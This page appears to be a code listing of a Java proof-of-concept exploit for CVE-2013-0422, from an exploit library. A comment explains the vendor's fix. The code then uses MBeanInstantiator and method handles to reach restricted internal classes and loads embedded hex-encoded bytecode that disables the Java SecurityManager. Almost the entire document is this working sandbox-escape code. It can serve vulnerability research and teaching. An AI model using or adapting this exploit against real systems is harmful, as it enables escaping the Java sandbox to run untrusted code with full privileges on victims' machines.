Package

Source Code of CVE_2013_0422

/**
* Copyright (c) 2013-2014
*
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* The Java-Exploit-Library is licensed under the Creative Commons
* Attribution-ShareAlike 4.0 International License.
*
* Please see the provided LICENSE.txt for a full copy of the agreement.
*/

import java.lang.invoke.MethodHandle;
import java.lang.invoke.MethodHandles;
import java.lang.invoke.MethodType;

import com.sun.jmx.mbeanserver.JmxMBeanServer;
import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
import com.sun.jmx.mbeanserver.MBeanInstantiator;

/**
* This vulnerability was officially fixed in JDK 1.7.0_11, but the entry linked
* below states that it may not be fixed completely: "a reliable third party has
* claimed that the findClass/MBeanInstantiator vector was not fixed in Oracle
* Java 7 Update 11. If there is still a vulnerable condition, then a separate
* CVE identifier might be created for the unfixed issue."
*
* This was the fix:
*
* In MethodHandles this method was inserted:
*
* private MethodHandle maybeBindCaller(MemberName method, MethodHandle mh)
* throws IllegalAccessException { if (allowedModes == TRUSTED ||
* !MethodHandleNatives.isCallerSensitive(method)) return mh; Class<?> hostClass
* = lookupClass; if ((allowedModes & PRIVATE) == 0) // caller must use
* full-power lookup hostClass = null; MethodHandle cbmh =
* MethodHandleImpl.bindCaller(mh, hostClass); cbmh = fixVarargs(cbmh, mh); //
* in JDK 7 version, varargs happens earlier and must be repaired return cbmh; }
*
* It is not consistently (?) called at:
*
* accessSpecial(Class<?>, MemberName, Class<?>) accessStatic(Class<?>,
* MemberName) accessVirtual(Class<?>, MemberName) bind(Object, String,
* MethodType) unreflect(Method) unreflectSpecial(Method, Class<?>)
*
* The method replaces DirectMethodHandle by AdapterMethodHandle, which results
* in a new stack layout:
*
* MethodHandles$Lookup.findConstructor(Class<?>, MethodType) line: 685
* MethodHandleImpl$BindCaller$T.invoke_V(MethodHandle, Object[]) line: 1422
* //new frame! AdapterMethodHandle(MethodHandle).invokeWithArguments(Object...)
* line: 566 CVE_2013_0422.createContextObject(Class, MethodHandles$Lookup)
* line: 80 CVE_2013_0422.disableSecurity() line: 42
* CVE_2013_0422.main(String[]) line: 29
*
* instead before:
*
* MethodHandles$Lookup.findConstructor(Class<?>, MethodType) line: 685
* DirectMethodHandle(MethodHandle).invokeWithArguments(Object...) line: 566
* CVE_2013_0422.createContextObject(Class, MethodHandles$Lookup) line: 80
* CVE_2013_0422.disableSecurity() line: 42 CVE_2013_0422.main(String[]) line:
* 29
*
* With the new layout, security checks work again.
*
*
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422
*/
@SuppressWarnings("rawtypes")
public class CVE_2013_0422 {

  public static String byteArrayWithSecOff = "CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F0700200100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F457863657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F7572636546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A656374010001420100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C65676564457863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100040009000C00030003000B000000120004000000080004000B0009000C000D000D000C000000160002000D0000000D000E00010000000E000F001000000011000000100002FF000C00010700120001070013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B000000002000B0000000A00020000001000040011000C0000000C00010000000C000F0010000000010016000000020017";
  private static MethodHandles.Lookup lookup;

  public static void main(String[] args) throws Throwable {
    System.setSecurityManager(new SecurityManager());
    System.out.println("SecurityManager: " + System.getSecurityManager());

    disableSecurity();
    System.out.println("SecurityManager: " + System.getSecurityManager());
  }

  private static void disableSecurity() throws Throwable {
    JmxMBeanServer beanServer = (JmxMBeanServer) new JmxMBeanServerBuilder().newMBeanServer("", null, null);
    MBeanInstantiator beanInstantiator = beanServer.getMBeanInstantiator();
    ClassLoader a = null;
    Class contextClass = beanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
    Class generatedClassLoaderClass = beanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);

    lookup = MethodHandles.publicLookup();

    Object contextObject = createContextObject(contextClass, lookup);

    MethodType findVirtualType = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
    MethodHandle findVirtualHandle = lookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", findVirtualType);

    Object classLoader = createClassLoader(contextClass, generatedClassLoaderClass, contextObject, findVirtualHandle);
    Class customClass = createCustomClass(generatedClassLoaderClass, findVirtualHandle, classLoader);

    customClass.newInstance();
  }

  private static Class createCustomClass(Class generatedClassLoaderClass, MethodHandle findVirtualHandle, Object classLoader) throws Throwable {
    MethodType defineClassType = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
    MethodHandle defineClassHandle = (MethodHandle) findVirtualHandle.invokeWithArguments(new Object[] { lookup, generatedClassLoaderClass, "defineClass",
        defineClassType });

    Class customClass = (Class) defineClassHandle.invokeWithArguments(new Object[] { classLoader, null, hex2Byte(byteArrayWithSecOff) });
    return customClass;
  }

  private static Object createClassLoader(Class contextClass, Class generatedClassLoaderClass, Object contextObject, MethodHandle findVirtualHandle)
      throws Throwable {
    MethodType createClassLoaderType = MethodType.methodType(generatedClassLoaderClass, ClassLoader.class);
    MethodHandle createClassLoaderHandle = (MethodHandle) findVirtualHandle.invokeWithArguments(new Object[] { lookup, contextClass, "createClassLoader",
        createClassLoaderType });

    Object classLoader = createClassLoaderHandle.invokeWithArguments(new Object[] { contextObject, null });
    return classLoader;
  }

  private static Object createContextObject(Class contextClass, MethodHandles.Lookup lookup) throws NoSuchMethodException, IllegalAccessException, Throwable {
    MethodType findConstructorType = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
    MethodHandle findConstructorHandle = lookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", findConstructorType);

    MethodType constructorType = MethodType.methodType(Void.TYPE);
    MethodHandle constructorHandle = (MethodHandle) findConstructorHandle.invokeWithArguments(new Object[] { lookup, contextClass, constructorType });

    Object contextObject = constructorHandle.invokeWithArguments(new Object[0]);
    return contextObject;
  }

  public static byte[] hex2Byte(String paramString) {
    byte[] arrayOfByte = new byte[paramString.length() / 2];
    for (int i = 0; i < arrayOfByte.length; i++) {
      arrayOfByte[i] = (byte) Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16);
    }

    return arrayOfByte;
  }
}
TOP

Related Classes of CVE_2013_0422

TOP
Copyright © 2018 www.massapi.com. All rights reserved.
All source code are property of their respective owners. Java is a trademark of Sun Microsystems, Inc and owned by ORACLE Inc. Contact coftware#gmail.com.